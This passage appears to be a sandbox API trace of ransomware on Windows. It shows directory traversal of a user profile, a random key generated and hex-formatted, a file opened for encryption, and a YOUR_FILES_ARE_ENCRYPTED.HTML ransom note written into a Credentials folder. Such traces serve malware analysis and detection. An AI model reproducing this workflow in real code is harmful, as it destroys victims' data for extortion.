ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5AlR3U30D3", cAlternateFileName="5ALR3U~1")) returned 1 [0159.078] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3") returned 23 [0159.078] GetProcessHeap () returned 0x270000 [0159.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0159.078] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3") returned="\\\\?\\C:\\Users\\5AlR3U30D3" [0159.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\*" [0159.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.079] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.079] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="AppData", cAlternateFileName="")) returned 1 [0159.079] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData") returned 31 [0159.079] GetProcessHeap () returned 0x270000 [0159.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0159.080] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData" [0159.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*" [0159.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0159.080] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.081] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Local", cAlternateFileName="")) returned 1 [0159.081] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local") returned 37 [0159.081] GetProcessHeap () returned 0x270000 [0159.081] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0159.083] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local" [0159.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*" [0159.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0159.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0159.083] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data") returned 54 [0159.083] GetProcessHeap () returned 0x270000 [0159.083] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.084] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data" [0159.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*" [0159.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x75e0048, ftCreationTime.dwLowDateTime=0x74ea160, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hݞ")) returned 0xffffffff [0159.097] GetProcessHeap () returned 0x270000 [0159.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.098] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 1 [0159.098] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History") returned 45 [0159.098] GetProcessHeap () returned 0x270000 [0159.098] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.098] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History" [0159.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*" [0159.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x75e0048, ftCreationTime.dwLowDateTime=0x74ea160, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hݞ")) returned 0xffffffff [0159.098] GetProcessHeap () returned 0x270000 [0159.099] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.099] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaeaad4a0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0xbf12e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0159.099] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db") returned 50 [0159.099] lstrcmpW (lpString1="IconCache.db", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.099] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0159.099] lstrlenW (lpString=".db") returned 3 [0159.099] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0159.099] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0159.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.100] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=782638) returned 1 [0159.100] GetProcessHeap () returned 0x270000 [0159.100] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.102] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BC") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="5A") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1C") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="0E") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9C") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EA") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="03") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="23") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="89") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="35") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C4") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="83") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="81") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="47") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="76") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F2") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FE") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="09") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="26") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="9B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6D") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DE") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="59") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="17") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="13") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="1B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="48") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="01") returned 2 [0159.104] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" [0159.104] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.104] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0159.104] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft") returned 47 [0159.104] GetProcessHeap () returned 0x270000 [0159.104] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0159.105] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft" [0159.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*" [0159.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0159.105] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0159.105] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0159.105] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials") returned 59 [0159.105] GetProcessHeap () returned 0x270000 [0159.105] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.105] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials" [0159.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*" [0159.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.107] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.107] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0159.107] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.107] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.108] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.110] CloseHandle (hObject=0x4a8) returned 1 [0159.110] GetProcessHeap () returned 0x270000 [0159.111] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.111] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Feeds", cAlternateFileName="")) returned 1 [0159.111] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds") returned 53 [0159.111] GetProcessHeap () returned 0x270000 [0159.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.112] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds" [0159.112] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*" [0159.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, 